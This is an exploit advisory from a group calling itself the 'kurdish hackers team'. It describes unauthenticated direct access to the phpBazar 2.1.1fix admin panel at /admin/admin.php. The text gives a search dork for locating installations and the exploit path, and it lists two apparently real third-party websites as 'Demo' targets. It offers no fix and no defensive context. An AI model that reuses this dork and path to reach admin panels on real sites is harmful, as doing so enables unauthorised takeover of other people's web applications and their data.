phpBazar version 2.1.1fix suffers from a direct access vulnerability that allows for use of the administrative panel.
573c05143c1cf932e36ab0e724377102c4b88786a7568e99811728a0a5f842b3
======================================================
phpBazar-2.1.1fix all Version Remote Administration-Panel Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: phpBazar-2.1.1fix
<<->> download script ::
http://www.smartisoft.com/products.php?product=phpbazar
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Dork:phpBazar Ver. 2.1.0
<<->> Exploit ::
>>> www.site/path /admin/admin.php
Now we have admin control panel...
<<->> Demo :
http://tarot24-online.de/ll/phpBazar-2.1.1fix/admin/admin.php
http://www.kmlogsdon.com/admin/admin.php
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , all member kurdish hackers team